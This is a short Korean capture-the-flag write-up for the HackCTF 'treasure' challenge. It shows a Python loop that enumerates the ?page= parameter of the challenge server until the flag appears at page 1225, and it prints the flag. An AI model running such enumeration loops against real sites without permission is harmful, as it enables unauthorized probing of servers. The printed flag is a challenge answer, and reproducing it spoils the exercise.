hackctf 보물 문제 풀이

해당 페이지에 들어가보면은 Page 1 , Page 2 , Page 3 가 있는데 각각 버튼을 누르면은

url 에 ?page=1 로 바뀌면서 GET 방식으로 데이터를 전달하면

이런식으로 해쉬가 나오게 된다.

 

2번째 버튼을 누르면 ?page=2

3번째 버튼을 누르면 ?page=3

이렇게 1씩 추가되는데 

 

감으로 대충 python 스크립트를 짜서 요청 여러번 전송해보면 어떨까 하고 생각했다.

import requests

for i in range(1,10000):
    r = requests.get(f'http://ctf.j0n9hyun.xyz:2025/?page={i}').text
    print(i)
    if r.find('HackCTF') != -1:
        print(r)
        break

이런식으로 짜고 실행을 하고

flag 가 나올때까지 기다려보면

1225번째에서 FLAG 가 나오는것을 볼 수 있다.

확실히 사람이 직접 수동적으로 하는것보다 python 같은 자동적인 스크립트를 싸서 실행하면은 훨신 수월하고 빠르게 원하는대로 할 수 있다.

 

FLAG is HackCTF{0hhhhh_5o_g0od_try!}